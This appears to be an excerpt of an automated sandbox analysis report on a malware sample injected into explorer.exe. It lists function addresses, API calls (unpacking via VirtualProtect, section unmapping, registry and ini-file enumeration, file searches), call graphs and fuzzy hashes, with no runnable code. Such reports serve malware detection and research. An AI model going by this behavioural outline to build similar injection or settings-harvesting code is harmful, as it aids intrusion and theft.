                                                                                                        Function 0311F21C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 030F6A81: memset.NTDLL ref: 030F6A9C
                                                                                                        • _aulldiv.NTDLL(?,00000000,?,00000000), ref: 0311F2A1
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _aulldivmemset
                                                                                                        • String ID: %llu$%llu
                                                                                                        • API String ID: 714058258-4283164361
                                                                                                        • Opcode ID: 88433cdb8012bdf03943d841dcaef5d6abeba7de99f84315994e2d1b90246861
                                                                                                        • Instruction ID: 37ff861c73e6809a3a608cc692b6fe8ce9926657369e66b37f501fadc7e9e572
                                                                                                        • Opcode Fuzzy Hash: 88433cdb8012bdf03943d841dcaef5d6abeba7de99f84315994e2d1b90246861
                                                                                                        • Instruction Fuzzy Hash: 9E21D4B66403056FC610EA64CC41FAFB769AF89730F044328FA219B6C0DB21DC2686E1
                                                                                                        Function 0310203C Relevance: 5.3, APIs: 4, Instructions: 274COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • _allmul.NTDLL(?,00000000,?), ref: 03102174
                                                                                                        • _allmul.NTDLL(?,?,?,00000000), ref: 0310220E
                                                                                                        • _allmul.NTDLL(?,00000000,00000000,?), ref: 03102241
                                                                                                        • _allmul.NTDLL(030F2E26,00000000,?,?), ref: 03102295
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _allmul
                                                                                                        • String ID:
                                                                                                        • API String ID: 4029198491-0
                                                                                                        • Opcode ID: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                        • Instruction ID: 4b6fe27fe4036bdb092d24d4991674e9d30c714a4926965420b48dd7faaa4225
                                                                                                        • Opcode Fuzzy Hash: 3085842643abf35a20991388616d187f76d7e9293e8280a6adbe6ee58f7c727c
                                                                                                        • Instruction Fuzzy Hash: ADA18B747087059FC714EEA4C894A2EB7EAAFCC704F444C2DF6558B290EBB1EC468B42
                                                                                                        Function 031078B9 Relevance: 5.2, APIs: 4, Instructions: 227COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: memcpymemset
                                                                                                        • String ID:
                                                                                                        • API String ID: 1297977491-0
                                                                                                        • Opcode ID: eaff050aa4eac8f2408cedc3c65164600f6ffa913653a6c1a289204721c2930e
                                                                                                        • Instruction ID: a4eaff962fefa50fee9212452793f19d70e83d5588426507adea61240fb60abc
                                                                                                        • Opcode Fuzzy Hash: eaff050aa4eac8f2408cedc3c65164600f6ffa913653a6c1a289204721c2930e
                                                                                                        • Instruction Fuzzy Hash: B68180756083149FC354EF29C880A2BBBE5FF8C614F09496DF8CA9B291D7B0E944CB91
                                                                                                        Function 030F190B Relevance: 5.0, APIs: 4, Instructions: 36stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • lstrlen.KERNEL32(?,?,?,?,00000000,030F2783), ref: 030F192B
                                                                                                        • lstrlen.KERNEL32(00000000,?,?,?,00000000,030F2783), ref: 030F1930
                                                                                                        • lstrcat.KERNEL32(00000000,?), ref: 030F1946
                                                                                                        • lstrcat.KERNEL32(00000000,00000000), ref: 030F194A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000C.00000002.2734028069.00000000030F1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030F1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_12_2_30f1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcatlstrlen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1475610065-0
                                                                                                        • Opcode ID: d8577aba4ba9fdd4c47df673f5e8d48931c0446900ef85619bfa19fc2473da5b
                                                                                                        • Instruction ID: ba73c824ddac268f8083d0d6f2cae6dcf6bcd33d05f5a0b808aaef42c2716c50
                                                                                                        • Opcode Fuzzy Hash: d8577aba4ba9fdd4c47df673f5e8d48931c0446900ef85619bfa19fc2473da5b
                                                                                                        • Instruction Fuzzy Hash: 1DE09BA630525C6F4624B6AE5C84D7B76DCCACD4A53090175FA05D3205EF569C0146F0

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:21.7%
                                                                                                        Dynamic/Decrypted Code Coverage:86.8%
                                                                                                        Signature Coverage:0%
                                                                                                        Total number of Nodes:182
                                                                                                        Total number of Limit Nodes:17
                                                                                                        execution_graph 1007 3ca1af 1008 3ca1bd 1007->1008 1009 3ca1cf 1008->1009 1010 3ca298 3 API calls 1008->1010 1011 3ca248 1010->1011 940 3ca298 941 3ca29d 940->941 942 3ca385 LoadLibraryA 941->942 944 3ca3e0 VirtualProtect VirtualProtect 941->944 946 3ca3d5 941->946 942->941 945 3ca46e 944->945 945->945 1012 3c3668 1017 3c3458 StrStrIW 1012->1017 1015 3c3458 17 API calls 1016 3c36bd 1015->1016 1018 3c348f 1017->1018 1031 3c350f 1017->1031 1042 3c2774 1018->1042 1020 3c34a8 1027 3c3507 1020->1027 1020->1031 1055 3c28a0 1020->1055 1021 3c3523 RegOpenKeyExW 1022 3c354d 1021->1022 1023 3c35e4 1021->1023 1024 3c35b5 RegEnumKeyExW 1022->1024 1030 3c2700 RtlFreeHeap 1022->1030 1035 3c3458 14 API calls 1022->1035 1038 3c1860 RtlFreeHeap 1022->1038 1025 3c1860 RtlFreeHeap 1023->1025 1024->1022 1024->1023 1026 3c35f7 1025->1026 1026->1015 1028 3c1860 RtlFreeHeap 1027->1028 1028->1031 1030->1022 1031->1021 1033 3c34fa 1036 3c1860 RtlFreeHeap 1033->1036 1035->1022 1036->1027 1038->1022 1041 3c1860 RtlFreeHeap 1041->1033 1043 3c2797 RegOpenKeyExW 1042->1043 1044 3c2793 1042->1044 1045 3c286b 1043->1045 1046 3c27d5 RegQueryValueExW 1043->1046 1044->1043 1047 3c288d 1045->1047 1050 3c2774 RtlFreeHeap 1045->1050 1048 3c27fe 1046->1048 1049 3c285b RegCloseKey 1046->1049 1047->1020 1048->1049 1051 3c281a RegQueryValueExW 1048->1051 1049->1045 1049->1047 1050->1047 1052 3c2844 1051->1052 1053 3c2851 1051->1053 1052->1049 1054 3c1860 RtlFreeHeap 1053->1054 1054->1052 1056 3c28b9 1055->1056 1057 3c2922 1056->1057 1058 3c1860 RtlFreeHeap 1056->1058 1057->1033 1061 3c2700 1057->1061 1059 3c28df 1058->1059 1059->1057 1060 3c2774 5 API calls 1059->1060 1060->1059 1062 3c2712 1061->1062 1063 3c1860 RtlFreeHeap 1062->1063 1064 3c271d 1063->1064 1064->1033 1065 3c3254 1064->1065 1089 3c298c 1065->1089 1068 3c343a 1068->1041 1069 3c298c GetFileAttributesW 1072 3c3295 1069->1072 1070 3c342c 1098 3c30a8 1070->1098 1072->1068 1072->1070 1093 3c2938 1072->1093 1075 3c340c 1078 3c1860 RtlFreeHeap 1075->1078 1076 3c3304 GetPrivateProfileSectionNamesW 1076->1075 1077 3c331e 1076->1077 1077->1075 1083 3c334e GetPrivateProfileStringW 1077->1083 1087 3c30a8 RtlFreeHeap FindFirstFileW FindNextFileW FindClose 1077->1087 1088 3c1860 RtlFreeHeap 1077->1088 1079 3c3414 1078->1079 1080 3c1860 RtlFreeHeap 1079->1080 1081 3c341c 1080->1081 1082 3c1860 RtlFreeHeap 1081->1082 1084 3c3424 1082->1084 1083->1077 1085 3c3379 GetPrivateProfileIntW 1083->1085 1086 3c1860 RtlFreeHeap 1084->1086 1085->1077 1086->1070 1087->1077 1088->1077 1090 3c2999 1089->1090 1092 3c29a9 1089->1092 1091 3c299e GetFileAttributesW 1090->1091 1090->1092 1091->1092 1092->1068 1092->1069 1094 3c2980 1093->1094 1095 3c2945 1093->1095 1094->1075 1094->1076 1095->1094 1096 3c294a CreateFileW 1095->1096 1096->1094 1097 3c2972 CloseHandle 1096->1097 1097->1094 1099 3c30cc 1098->1099 1100 3c30f1 FindFirstFileW 1099->1100 1101 3c3237 1100->1101 1111 3c3117 1100->1111 1102 3c1860 RtlFreeHeap 1101->1102 1103 3c323f 1102->1103 1104 3c1860 RtlFreeHeap 1103->1104 1105 3c3247 1104->1105 1105->1068 1106 3c3210 FindNextFileW 1107 3c3226 FindClose 1106->1107 1106->1111 1107->1101 1108 3c1860 RtlFreeHeap 1108->1106 1110 3c2700 RtlFreeHeap 1110->1111 1111->1106 1111->1108 1111->1110 1112 3c30a8 RtlFreeHeap 1111->1112 1113 3c1860 RtlFreeHeap 1111->1113 1114 3c2f7c 1111->1114 1112->1111 1113->1111 1124 3c2bc0 1114->1124 1117 3c3086 1117->1111 1119 3c307e 1120 3c1860 RtlFreeHeap 1119->1120 1120->1117 1121 3c2fb6 1121->1117 1121->1119 1122 3c2e04 RtlFreeHeap 1121->1122 1123 3c1860 RtlFreeHeap 1121->1123 1122->1121 1123->1121 1125 3c2bf3 1124->1125 1126 3c2700 RtlFreeHeap 1125->1126 1127 3c2c54 1126->1127 1128 3c2a54 RtlFreeHeap 1127->1128 1129 3c2c68 1128->1129 1130 3c2c7e 1129->1130 1131 3c1860 RtlFreeHeap 1129->1131 1132 3c1860 RtlFreeHeap 1130->1132 1131->1130 1138 3c2cb2 1132->1138 1133 3c2da3 1134 3c1860 RtlFreeHeap 1133->1134 1135 3c2dd9 1134->1135 1136 3c1860 RtlFreeHeap 1135->1136 1137 3c2de1 1136->1137 1137->1117 1140 3c2a54 1137->1140 1138->1133 1139 3c1860 RtlFreeHeap 1138->1139 1139->1133 1141 3c2a86 1140->1141 1142 3c1860 RtlFreeHeap 1141->1142 1143 3c2ad9 1141->1143 1142->1143 1143->1121 1148 3c3608 1149 3c3458 17 API calls 1148->1149 1150 3c363b 1149->1150 1151 3c3458 17 API calls 1150->1151 1152 3c365d 1151->1152 995 3ca1f9 996 3ca228 995->996 997 3ca479 995->997 1000 3ca298 996->1000 1001 3ca29d 1000->1001 1002 3ca385 LoadLibraryA 1001->1002 1004 3ca3e0 VirtualProtect VirtualProtect 1001->1004 1006 3ca248 1001->1006 1002->1001 1005 3ca46e 1004->1005 1005->1005 947 3c37f4 948 3c3804 947->948 955 3c372c 948->955 951 3c387c 953 3c3817 953->951 965 3c36c8 953->965 956 3c375a 955->956 957 3c3777 RegCreateKeyExW 956->957 958 3c37bc RegCloseKey 957->958 959 3c37cd 957->959 958->959 973 3c1860 959->973 962 3c22b4 963 3c22c8 CreateStreamOnHGlobal 962->963 964 3c22d6 962->964 963->964 964->953 966 3c371e 965->966 968 3c36cd 965->968 966->951 967 3c3716 969 3c1860 RtlFreeHeap 967->969 968->967 977 3c21e4 968->977 969->966 971 3c3706 972 3c1860 RtlFreeHeap 971->972 972->967 974 3c186e 973->974 975 3c1886 974->975 976 3c1878 RtlFreeHeap 974->976 975->951 975->962 976->975 978 3c220b 977->978 983 3c1e20 978->983 981 3c1860 RtlFreeHeap 982 3c2297 981->982 982->971 993 3c1e6d 983->993 984 3c21b5 985 3c1860 RtlFreeHeap 984->985 986 3c21cb 985->986 986->981 987 3c219b 987->984 988 3c1860 RtlFreeHeap 987->988 988->984 989 3c2177 990 3c1860 RtlFreeHeap 989->990 991 3c218e 990->991 991->987 992 3c1860 RtlFreeHeap 991->992 992->987 993->984 993->987 993->989 994 3c1860 RtlFreeHeap 993->994 994->989 1144 3ca1e0 1145 3ca1e6 1144->1145 1146 3ca298 3 API calls 1145->1146 1147 3ca248 1146->1147

                                                                                                        Callgraph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        • Opacity -> Relevance
                                                                                                        • Disassembly available
                                                                                                        callgraph 0 Function_003C2938 1 Function_003C1838 2 Function_003C1938 3 Function_003C22B4 4 Function_003C9EB4 5 Function_003C38B0 5->1 5->5 75 Function_003C1AD4 5->75 6 Function_003C9930 7 Function_003C14B2 8 Function_003C372C 8->1 65 Function_003C1860 8->65 9 Function_003C22AC 10 Function_003C23AC 11 Function_003C272C 12 Function_003CA1AF 24 Function_003CA298 12->24 13 Function_003C30A8 13->11 13->13 39 Function_003C2688 13->39 45 Function_003C2700 13->45 48 Function_003C2F7C 13->48 50 Function_003C2AF8 13->50 13->65 14 Function_003C41A9 15 Function_003C47A7 16 Function_003C99A7 17 Function_003C28A0 17->1 54 Function_003C2774 17->54 17->65 18 Function_003C23A0 19 Function_003C1E20 19->1 27 Function_003C1D10 19->27 35 Function_003C188C 19->35 43 Function_003C1980 19->43 49 Function_003C18F8 19->49 19->65 66 Function_003C1DE0 19->66 80 Function_003C18D0 19->80 85 Function_003C1C40 19->85 20 Function_003C1822 21 Function_003C971C 22 Function_003C141D 23 Function_003C2498 23->10 86 Function_003C2340 23->86 72 Function_003CA25A 24->72 25 Function_003C1B14 25->1 26 Function_003C2514 26->18 57 Function_003C23F0 26->57 68 Function_003C2360 26->68 74 Function_003C2354 26->74 81 Function_003C234C 26->81 27->1 27->49 28 Function_003C2410 28->10 28->57 29 Function_003C2610 29->1 30 Function_003CB111 31 Function_003C9912 32 Function_003C9C92 33 Function_003C298C 34 Function_003C1B8C 34->1 35->1 36 Function_003CB00C 37 Function_003C1508 38 Function_003C2308 39->1 40 Function_003C3608 70 Function_003C3458 40->70 41 Function_003C2E04 41->1 41->34 41->65 42 Function_003C1405 44 Function_003C1000 45->39 45->65 46 Function_003CB181 47 Function_003C4082 48->41 51 Function_003C2EF8 48->51 48->65 78 Function_003C2A54 48->78 88 Function_003C2BC0 48->88 50->1 51->29 52 Function_003C14F9 53 Function_003CA1F9 53->24 54->1 54->54 54->65 55 Function_003C37F4 55->3 55->8 55->9 55->38 58 Function_003C2570 55->58 60 Function_003C2B6C 55->60 62 Function_003C22E8 55->62 55->74 83 Function_003C36C8 55->83 56 Function_003C1576 57->10 58->1 58->18 58->74 59 Function_003C156C 60->23 60->26 61 Function_003C18E8 63 Function_003C3668 63->70 64 Function_003C21E4 64->1 64->19 64->65 65->75 82 Function_003C1A4C 66->82 67 Function_003C1560 69 Function_003CA1E0 69->24 70->1 70->17 70->39 70->45 70->54 70->65 70->70 73 Function_003C3254 70->73 87 Function_003C29C0 70->87 71 Function_003C9ADA 73->0 73->1 73->11 73->13 73->33 73->39 73->65 76 Function_003C14D4 77 Function_003C1254 78->1 78->65 79 Function_003CA055 83->25 83->61 83->64 83->65 84 Function_003C4048 87->39 88->1 88->2 88->11 88->29 88->39 88->45 88->65 88->78 89 Function_003C9FC2

                                                                                                        Executed Functions

                                                                                                        Function 003C30A8 Relevance: 4.7, APIs: 3, Instructions: 153fileCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 184 3c30a8-3c30e3 call 3c2688 call 3c272c 189 3c30ec-3c3111 call 3c2688 FindFirstFileW 184->189 190 3c30e5-3c30e6 184->190 193 3c3237-3c3252 call 3c1860 * 2 189->193 194 3c3117-3c3118 189->194 190->189 195 3c311f-3c3124 194->195 197 3c31ad-3c31df call 3c2688 call 3c2700 195->197 198 3c312a-3c313e 195->198 214 3c3208-3c320b call 3c1860 197->214 215 3c31e1-3c31eb call 3c2af8 197->215 205 3c3144-3c3158 198->205 206 3c3210-3c3220 FindNextFileW 198->206 205->206 212 3c315e-3c316b call 3c272c 205->212 206->195 209 3c3226-3c3230 FindClose 206->209 209->193 219 3c316d-3c3174 212->219 220 3c3176 212->220 214->206 215->214 223 3c31ed-3c3203 call 3c2f7c 215->223 222 3c3178-3c31a8 call 3c2688 call 3c2700 call 3c30a8 call 3c1860 219->222 220->222 222->197 223->214
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Find$File$CloseFirstNext
                                                                                                        • String ID:
                                                                                                        • API String ID: 3541575487-0
                                                                                                        • Opcode ID: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                        • Instruction ID: 4ec66c56d9503b2d86d15db3a28e20a3f2c0276f556451b89981f72dbc79b463
                                                                                                        • Opcode Fuzzy Hash: 1d486c4d822fa2842588a2a5b257e154b5955fe3e65b36dc891d1a63625ddf83
                                                                                                        • Instruction Fuzzy Hash: D9414E31318B4C4FDB96FB289899BAB76D2FBD8340F448A2DA44AC7251EE74DD048781
                                                                                                        Function 003C38B0 Relevance: 1.5, APIs: 1, Instructions: 40nativeCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 239 3c38b0-3c3907 call 3c1ad4 call 3c1838 NtUnmapViewOfSection call 3c388c 248 3c3909-3c390c call 3c38b0 239->248 249 3c3911-3c391a 239->249 248->249
                                                                                                        APIs
                                                                                                        • NtUnmapViewOfSection.NTDLL ref: 003C38F2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: SectionUnmapView
                                                                                                        • String ID:
                                                                                                        • API String ID: 498011366-0
                                                                                                        • Opcode ID: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                        • Instruction ID: a165544b0287e9e96878b1e8a1011961125619e3f2542fd40a412db9c75e0e3a
                                                                                                        • Opcode Fuzzy Hash: 3effbf976d711b6f0a270e8bac9098164ff64bae19101d68ee38af86237bc783
                                                                                                        • Instruction Fuzzy Hash: 91F0E520F11B080BEF6D77BD685D73832D0EB59310F90852DB519CB2D2DD398E498302
                                                                                                        Function 003C2774 Relevance: 6.1, APIs: 4, Instructions: 124registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • RegOpenKeyExW.KERNELBASE ref: 003C27C7
                                                                                                        • RegQueryValueExW.KERNELBASE ref: 003C27F4
                                                                                                        • RegQueryValueExW.KERNELBASE ref: 003C283A
                                                                                                        • RegCloseKey.KERNELBASE ref: 003C2860
                                                                                                          • Part of subcall function 003C1860: RtlFreeHeap.NTDLL ref: 003C1880
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: QueryValue$CloseFreeHeapOpen
                                                                                                        • String ID:
                                                                                                        • API String ID: 1641618270-0
                                                                                                        • Opcode ID: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                        • Instruction ID: 68a4966c2a37c3e435b7fa76e6fbaf7f06345f814b7384f47d6ac19ef80bc0f6
                                                                                                        • Opcode Fuzzy Hash: 9230968f98c31981e9a295993d042543a9bd8a1a5e48c502c57164f1c8228ab1
                                                                                                        • Instruction Fuzzy Hash: F531A73020CB488FE76AEB29D498B7B77D0FBA8355F55062EE48AC2265DF34CC458742
                                                                                                        Function 003C372C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 71registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 22 3c372c-3c37ba call 3c1838 RegCreateKeyExW 26 3c37bc-3c37cb RegCloseKey 22->26 27 3c37d6-3c37f0 call 3c1860 22->27 26->27 28 3c37cd-3c37d3 26->28 28->27
                                                                                                        APIs
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCreate
                                                                                                        • String ID: ?
                                                                                                        • API String ID: 2932200918-1684325040
                                                                                                        • Opcode ID: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                        • Instruction ID: c6e9aad6742eec22bfa4e675b87a3262b69cfd09f8c4d020de14bf5e1263c5d6
                                                                                                        • Opcode Fuzzy Hash: 857738d7a85a5e3c817c71693e64eb2082b10df52a007d4c7754adbbf86b2b9f
                                                                                                        • Instruction Fuzzy Hash: 3B119070618B4C8FD751DF29D48876AB7E1FB98305F40062EE48AC3221DF38D985CB82
                                                                                                        Function 003CA298 Relevance: 4.8, APIs: 3, Instructions: 252memorylibraryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 31 3ca298-3ca29b 32 3ca2a5-3ca2a9 31->32 33 3ca2ab-3ca2b3 32->33 34 3ca2b5 32->34 33->34 35 3ca29d-3ca2a3 34->35 36 3ca2b7 34->36 35->32 37 3ca2ba-3ca2c1 36->37 39 3ca2cd 37->39 40 3ca2c3-3ca2cb 37->40 39->37 41 3ca2cf-3ca2d2 39->41 40->39 42 3ca2d4-3ca2e2 41->42 43 3ca2e7-3ca2f4 41->43 44 3ca31e-3ca339 42->44 45 3ca2e4-3ca2e5 42->45 53 3ca30e-3ca31c call 3ca25a 43->53 54 3ca2f6-3ca2f8 43->54 47 3ca36a-3ca36d 44->47 45->43 48 3ca36f-3ca370 47->48 49 3ca372-3ca379 47->49 51 3ca351-3ca355 48->51 52 3ca37f-3ca383 49->52 55 3ca33b-3ca33e 51->55 56 3ca357-3ca35a 51->56 57 3ca385-3ca39e LoadLibraryA 52->57 58 3ca3e0-3ca3e9 52->58 53->32 59 3ca2fb-3ca302 54->59 55->49 64 3ca340 55->64 56->49 60 3ca35c-3ca360 56->60 63 3ca39f-3ca3a6 57->63 61 3ca3ec-3ca3f5 58->61 79 3ca30c 59->79 80 3ca304-3ca30a 59->80 65 3ca341-3ca345 60->65 66 3ca362-3ca369 60->66 67 3ca41a-3ca46a VirtualProtect * 2 61->67 68 3ca3f7-3ca3f9 61->68 63->52 70 3ca3a8 63->70 64->65 65->51 71 3ca347-3ca349 65->71 66->47 75 3ca46e-3ca473 67->75 73 3ca40c-3ca418 68->73 74 3ca3fb-3ca40a 68->74 76 3ca3aa-3ca3b2 70->76 77 3ca3b4-3ca3bc 70->77 71->51 78 3ca34b-3ca34f 71->78 73->74 74->61 75->75 81 3ca475-3ca484 75->81 82 3ca3be-3ca3ca 76->82 77->82 78->51 78->56 79->53 79->59 80->79 85 3ca3cc-3ca3d3 82->85 86 3ca3d5-3ca3df 82->86 85->63
                                                                                                        APIs
                                                                                                        • LoadLibraryA.KERNELBASE ref: 003CA397
                                                                                                        • VirtualProtect.KERNELBASE(?,?,?,?,?,?,?,-00000003), ref: 003CA441
                                                                                                        • VirtualProtect.KERNELBASE ref: 003CA45F
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C9000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C9000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c9000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ProtectVirtual$LibraryLoad
                                                                                                        • String ID:
                                                                                                        • API String ID: 895956442-0
                                                                                                        • Opcode ID: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                        • Instruction ID: 78b186e72f95afb549928c4e93b5a8873a96b521806b7ad71ef0f70e21ac9e94
                                                                                                        • Opcode Fuzzy Hash: 58aacdddcf7ccbe6dd60936edcc7c5c7b61a302890236e98a304d03939a8bedf
                                                                                                        • Instruction Fuzzy Hash: 6F51AD32368D5D4BCB26AB7C9CD4BF4B3D1F759329B180A2EC08AC3284D959DC468383
                                                                                                        Function 003C3254 Relevance: 4.7, APIs: 3, Instructions: 210COMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        • Executed
                                                                                                        • Not Executed
                                                                                                        control_flow_graph 87 3c3254-3c3287 call 3c298c 90 3c328d-3c3297 call 3c298c 87->90 91 3c343a-3c3456 87->91 90->91 94 3c329d-3c32aa call 3c272c 90->94 97 3c32ac-3c32b3 94->97 98 3c32b5 94->98 99 3c32b7-3c32c2 call 3c2688 97->99 98->99 102 3c342c-3c3435 call 3c30a8 99->102 103 3c32c8-3c32fe call 3c2688 call 3c1838 * 2 call 3c2938 99->103 102->91 113 3c340c-3c3427 call 3c1860 * 4 103->113 114 3c3304-3c3318 GetPrivateProfileSectionNamesW 103->114 113->102 114->113 115 3c331e-3c3326 114->115 115->113 117 3c332c-3c332f 115->117 117->113 119 3c3335-3c3348 117->119 124 3c334e-3c3377 GetPrivateProfileStringW 119->124 125 3c33f0-3c3406 119->125 124->125 127 3c3379-3c3398 GetPrivateProfileIntW 124->127 125->113 125->117 130 3c339a-3c33ad call 3c2688 127->130 131 3c33e5-3c33eb call 3c30a8 127->131 135 3c33af-3c33b3 130->135 136 3c33c6-3c33e3 call 3c30a8 call 3c1860 130->136 131->125 137 3c33bd-3c33c4 135->137 138 3c33b5-3c33ba 135->138 136->125 137->135 137->136 138->137
                                                                                                        APIs
                                                                                                          • Part of subcall function 003C298C: GetFileAttributesW.KERNELBASE ref: 003C299E
                                                                                                        • GetPrivateProfileSectionNamesW.KERNEL32 ref: 003C330F
                                                                                                        • GetPrivateProfileStringW.KERNEL32 ref: 003C336F
                                                                                                        • GetPrivateProfileIntW.KERNEL32 ref: 003C338C
                                                                                                          • Part of subcall function 003C30A8: FindFirstFileW.KERNELBASE ref: 003C3104
                                                                                                          • Part of subcall function 003C1860: RtlFreeHeap.NTDLL ref: 003C1880
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: PrivateProfile$File$AttributesFindFirstFreeHeapNamesSectionString
                                                                                                        • String ID:
                                                                                                        • API String ID: 970345848-0
                                                                                                        • Opcode ID: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                        • Instruction ID: 095e211b7fdd89d24ba50e8bf211e9338c3d158f7659586b130103e33c683cc8
                                                                                                        • Opcode Fuzzy Hash: 2b93d8c4a12b134edfd1353bbe2ba01486881703c9a40a6279b7507c54960219
                                                                                                        • Instruction Fuzzy Hash: D251E830718F0D4FDB5EBB2D9816F7932D2EB98300B45456DE40AC7292EE64DD468386
                                                                                                        Function 003C3458 Relevance: 4.7, APIs: 3, Instructions: 172registryCOMMON
                                                                                                        Download Yara Rule

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • StrStrIW.KERNELBASE ref: 003C347E
                                                                                                        • RegOpenKeyExW.KERNELBASE ref: 003C353F
                                                                                                        • RegEnumKeyExW.KERNELBASE ref: 003C35D6
                                                                                                          • Part of subcall function 003C2774: RegOpenKeyExW.KERNELBASE ref: 003C27C7
                                                                                                          • Part of subcall function 003C2774: RegQueryValueExW.KERNELBASE ref: 003C27F4
                                                                                                          • Part of subcall function 003C2774: RegQueryValueExW.KERNELBASE ref: 003C283A
                                                                                                          • Part of subcall function 003C2774: RegCloseKey.KERNELBASE ref: 003C2860
                                                                                                          • Part of subcall function 003C3254: GetPrivateProfileSectionNamesW.KERNEL32 ref: 003C330F
                                                                                                          • Part of subcall function 003C1860: RtlFreeHeap.NTDLL ref: 003C1880
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 0000000D.00000002.2670899229.00000000003C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 003C1000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_13_2_3c1000_explorer.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: OpenQueryValue$CloseEnumFreeHeapNamesPrivateProfileSection
                                                                                                        • String ID:
                                                                                                        • API String ID: 1841478724-0
                                                                                                        • Opcode ID: 64400a878c992fa71e856e46df4fac4649fc2a7aa652cbc33b09ef089e85c32b
                                                                                                        • Instruction ID: 57d02b946627feab4c883a59cf4209656059d540c4d1843b3a632c8ebaee37e0
